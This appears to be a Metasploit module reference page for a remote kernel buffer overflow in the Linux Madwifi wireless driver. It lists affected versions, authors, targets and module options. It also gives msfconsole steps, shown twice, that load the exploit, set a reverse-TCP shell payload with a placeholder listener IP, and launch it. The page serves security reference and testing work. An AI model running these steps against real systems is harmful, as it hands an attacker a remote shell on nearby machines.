Madwifi SIOCGIWSCAN Buffer Overflow
The Madwifi driver under Linux is vulnerable to a remote kernel-mode stack-based buffer overflow. The vulnerability is triggered by one of these properly crafted information element: WPA, RSN, WME and Atheros OUI Current madwifi driver (0.9.2) and and all madwifi-ng drivers since r1504 are vulnerable Madwifi 0.9.2.1 release corrects the issue. This module has been tested against Ubuntu 6.10 and is 100% reliable, doesn\'t crash the Wifi stack and can exploit the same machine multiple time without the need to reboot it. This module depends on the Lorcon2 library and only works on the Linux platform with a supported wireless card. Please see the Ruby Lorcon2 documentation (external/ruby-lorcon/README) for more information.
Exploit Rank
- Average
Exploit Authors
- Julien Tinnes < julien at cr0.org >
- Laurent Butti < 0x9090 at gmail.com >
Vulnerability References
Exploit Targets
- 0 - Ubuntu 6.10
- 1 - Generic (you need non randomized vdso)
Exploit Development
Similar Exploit Modules
Exploit Usage Information
$ msfconsole
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/linux/madwifi/madwifi_giwscan_cb
msf exploit(madwifi_giwscan_cb) > show payloads
msf exploit(madwifi_giwscan_cb) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(madwifi_giwscan_cb) > set LHOST [MY IP ADDRESS]
msf exploit(madwifi_giwscan_cb) > show targets
msf exploit(madwifi_giwscan_cb) > set TARGET [TARGET ID]
msf exploit(madwifi_giwscan_cb) > exploit
## ### ## ##
## ## #### ###### #### ##### ##### ## #### ######
####### ## ## ## ## ## ## ## ## ## ## ### ##
####### ###### ## ##### #### ## ## ## ## ## ## ##
## # ## ## ## ## ## ## ##### ## ## ## ## ##
## ## #### ### ##### ##### ## #### #### #### ###
##
msf > use exploit/linux/madwifi/madwifi_giwscan_cb
msf exploit(madwifi_giwscan_cb) > show payloads
msf exploit(madwifi_giwscan_cb) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(madwifi_giwscan_cb) > set LHOST [MY IP ADDRESS]
msf exploit(madwifi_giwscan_cb) > show targets
msf exploit(madwifi_giwscan_cb) > set TARGET [TARGET ID]
msf exploit(madwifi_giwscan_cb) > exploit
Exploit Module Options
| ADDR_DST | The MAC address of the target system (default: FF:FF:FF:FF:FF:FF) |
| CHANNEL | The initial channel (default: 11) |
| DRIVER | The name of the wireless driver for lorcon (default: autodetect) |
| INTERFACE | The name of the wireless interface (default: wlan0) |
| LENGTH | Length after local variables in giwscan_cb() to overwrite (default: 24) |
| RUNTIME | The number of seconds to run the attack (default: 600) |
| SINGLESHOT | Break after first victim (for msfcli) (default: false) |
| SSID | The SSID of the emulated access point (default: test) |
| ContextInformationFile | The information file that contains context information |
| DisablePayloadHandler | Disable the handler code for the selected payload |
| EnableContextEncoding | Use transient context when encoding payloads |
| VERBOSE | Enable detailed status messages |
| WORKSPACE | Specify the workspace for this module |
| WfsDelay | Additional delay when waiting for a session |